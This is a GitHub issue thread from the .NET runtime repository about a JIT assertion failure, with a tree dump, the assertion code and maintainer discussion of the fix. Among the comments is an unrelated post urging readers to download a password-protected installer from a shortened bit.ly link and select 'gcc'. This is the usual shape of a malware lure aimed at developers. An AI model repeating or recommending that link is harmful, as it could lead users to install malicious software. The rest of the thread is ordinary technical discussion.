### ISSUE TITLE
JIT: Assertion failed 'tree->TypeIs(varDsc->TypeGet(), genActualType(varDsc)) ...

### ISSUE THREAD

**Issue by AndyAyersMS** [dotnet/runtime#107045]
Running https://github.com/KirillOsenkov/MSBuildStructuredLog on windows arm64, .NET 9 preview 7:

```
ISSUE: <ASSERT> #1 C:\repos\runtime0\src\coreclr\jit\lclvars.cpp (4693) - Assertion failed 'tree->TypeIs(varDsc->TypeGet(), genActualType(varDsc)) || (tree->TypeIs(TYP_BYREF) && (varDsc->TypeGet() == TYP_I_IMPL)) || (tree->TypeIs(TYP_INT) && (varDsc->TypeGet() == TYP_LONG))' in 'MS.Internal.Text.TextInterface.FontFace:GetArrayOfGlyphIndices(ulong,uint,ulong):this' during 'Mark local vars' (IL size 55; hash 0xcdc206b9; Instrumented Tier1)
```

Method context: [bad.zip](https://github.com/user-attachments/files/16766017/bad.zip)

**Comment by AndyAyersMS** [comment]
We've probably modified the jit interface so make sure to use the right build for the above. I will try and get a repro om main too.

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by AndyAyersMS** [comment]
Seems like the same method and similar issue as in #39040.

V06 is `TYP_BYREF` and we have
```
               [000027] DACXG+-----                         *  STORE_LCL_VAR int    V09 tmp2
               [000022] --CXG+-----                         \--*  CALL ind unman popargs int
               [000021] -----+----- calli tgt                  \--*  LCL_VAR   long   V08 tmp1
               [000010] -----+----- arg0 in x0                 +--*  LCL_VAR   long   V11 tmp4
               [000011] -----+----- arg1 in x1                 +--*  LCL_VAR   long   V06 loc2
               [000012] -----+----- arg2 in x2                 +--*  LCL_VAR   int    V02 arg2
               [000013] -----+----- arg3 in x3                 \--*  LCL_VAR   long   V05 loc1
```
and the assertion is
```C++
        // Check that the LCL_VAR node has the same type as the underlying variable, save a few mismatches we allow.
        assert(tree->TypeIs(varDsc->TypeGet(), genActualType(varDsc)) ||
               (tree->TypeIs(TYP_BYREF) && (varDsc->TypeGet() == TYP_I_IMPL)) || // Created by inliner substitution.
               (tree->TypeIs(TYP_INT) && (varDsc->TypeGet() == TYP_LONG)));      // Created by "optNarrowTree".
```
so we have a varDsc of `TYP_BYREF` and a use of `TYP_LONG`.

Perhaps we should be explicitly casting away GC, rather than just retyping.

**Comment by AndyAyersMS** [comment]
Seems like this is an old issue, and somewhat harmless, so I don't think we need to push a fix for .net 9.

**Comment by SingleAccretion** [comment]
This assert was somewhat recently tightened to disallow this case, under the assumption it could not happen. It could be relaxed to allow the reverse retyping again.

**Comment by jakobbotsch** [comment]
> Perhaps we should be explicitly casting away GC, rather than just retyping.

I would much prefer that solution. It's not clear to me that all of these mistyped locals are going to be handled correctly by the backends in all cases.
